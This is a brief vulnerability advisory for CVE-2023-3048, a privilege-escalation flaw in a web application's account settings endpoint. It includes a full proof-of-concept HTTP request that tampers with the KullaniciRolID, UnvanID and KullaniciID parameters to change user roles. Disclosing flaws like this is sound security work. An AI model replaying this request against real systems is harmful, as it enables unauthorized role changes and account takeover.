
CVE-ID: CVE-2023-3048
Author: Efe Özel
Team: Ömer Yılmaz – Murat Öztürk
Parameter: KullaniciRolID & UnvanID & KullaniciID
Details: By changing “KullaniciRolID” and “UnvanID”, the existing role or the roles of other users can be changed using the “KullaniciID”parameter.
HTTP REQUEST
POST /Ayarlar/K_Hesap?Length=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 151
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Ayarlar/KullaniciAyari/20
Cookie: admin=20
KullaniciID=20&KullaniciID=20&AdSoyad=Talas&Eposta=test@test.com&KullaniciRolID=2&UnvanID=1&Tel1=44444&Tel2=44444&X-Requested-With=XMLHttpRequest